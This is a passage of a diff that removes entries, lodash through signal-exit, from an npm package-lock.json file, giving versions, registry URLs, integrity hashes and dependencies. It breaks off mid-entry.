"sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" - }, - "node_modules/lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/matcher": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/matcher/-/matcher-4.0.0.tgz", - "integrity": "sha512-S6x5wmcDmsDRRU/c2dkccDwQPXoFczc5+HpQ2lON8pnvHlnvHAHj5WlLVvw6n6vNyHuVugYrFohYxbS+pvFpKQ==", - "dependencies": { - "escape-string-regexp": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==", - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "dependencies": { - "mime-db": "1.52.0" - }, - "engines": { - "node": ">= 0.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", - "dependencies": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/minizlib/node_modules/minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/minizlib/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - }, - "node_modules/mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", - "bin": { - "mkdirp": "bin/cmd.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/mustache": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/mustache/-/mustache-4.2.0.tgz", - "integrity": "sha512-71ippSywq5Yb7/tVYyGbkBggbU8H3u5Rz56fH60jGFgr8uHwxs+aSKeqmluIVzM0m0kB7xQjKS6qPfd0b2ZoqQ==", - "bin": { - "mustache": "bin/mustache" - } - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-fetch": { - "version": "2.6.12", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.12.tgz", - "integrity": "sha512-C/fGU2E8ToujUivIO0H+tpQ6HWo4eEmchoPIoXtxCrVghxdKq+QOHqEZW7tuP3KlV3bC8FRMO5nMCC7Zm1VP6g==", - "dependencies": { - "whatwg-url": "^5.0.0" - }, - "engines": { - "node": "4.x || >=6.0.0" - }, - "peerDependencies": { - "encoding": "^0.1.0" - }, - "peerDependenciesMeta": { - "encoding": { - "optional": true - } - } - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==", - "engines": { - "node": "*" - } - }, - "node_modules/object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "optional": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/oidc-token-hash": { - "version": "5.0.3", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.3.tgz", - "integrity": "sha512-IF4PcGgzAr6XXSff26Sk/+P4KZFJVuHAJZj3wgO3vX2bMdNVp/QXTP3P7CEm9V1IdG8lDLY3HhiqpsE/nOwpPw==", - "optional": true, - "engines": { - "node": "^10.13.0 || >=12.0.0" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/openid-client": { - "version": "5.4.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-5.4.3.tgz", - "integrity": "sha512-sVQOvjsT/sbSfYsQI/9liWQGVZH/Pp3rrtlGEwgk/bbHfrUDZ24DN57lAagIwFtuEu+FM9Ev7r85s8S/yPjimQ==", - "optional": true, - "dependencies": { - "jose": "^4.14.4", - "lru-cache": "^6.0.0", - "object-hash": "^2.2.0", - "oidc-token-hash": "^5.0.3" - }, - "funding": { - "url": "https://github.com/sponsors/panva" - } - }, - "node_modules/openid-client/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "optional": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/openid-client/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "optional": true - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-domain": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/parse-domain/-/parse-domain-4.1.0.tgz", - "integrity": "sha512-zas79foMEsbMbIcJoPx26+NISWa3jTzZykOW9mXfRzvgadHvAHGd7qcCc1FbSWbD1I4qP71UWAxlTgu7Uq6IQg==", - "dependencies": { - "is-ip": "^3.1.0", - "node-fetch": "^2.6.1", - "punycode": "^2.1.1" - }, - "bin": { - "parse-domain-update": "bin/update.js" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" - }, - "node_modules/punycode": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", - "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==", - "engines": { - "node": ">=6" - } - }, - "node_modules/pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", - "engines": { - "node": ">=0.6" - } - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", - "dependencies": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/request/node_modules/form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "dependencies": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - }, - "engines": { - "node": ">= 0.12" - } - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "dependencies": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/rfc4648": { - "version": "1.5.2", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.2.tgz", - "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==" - }, - "node_modules/safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/feross" - }, - { - "type": "patreon", - "url": "https://www.patreon.com/feross" - }, - { - "type": "consulting", - "url": "https://feross.org/support" - } - ] - }, - "node_modules/safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": 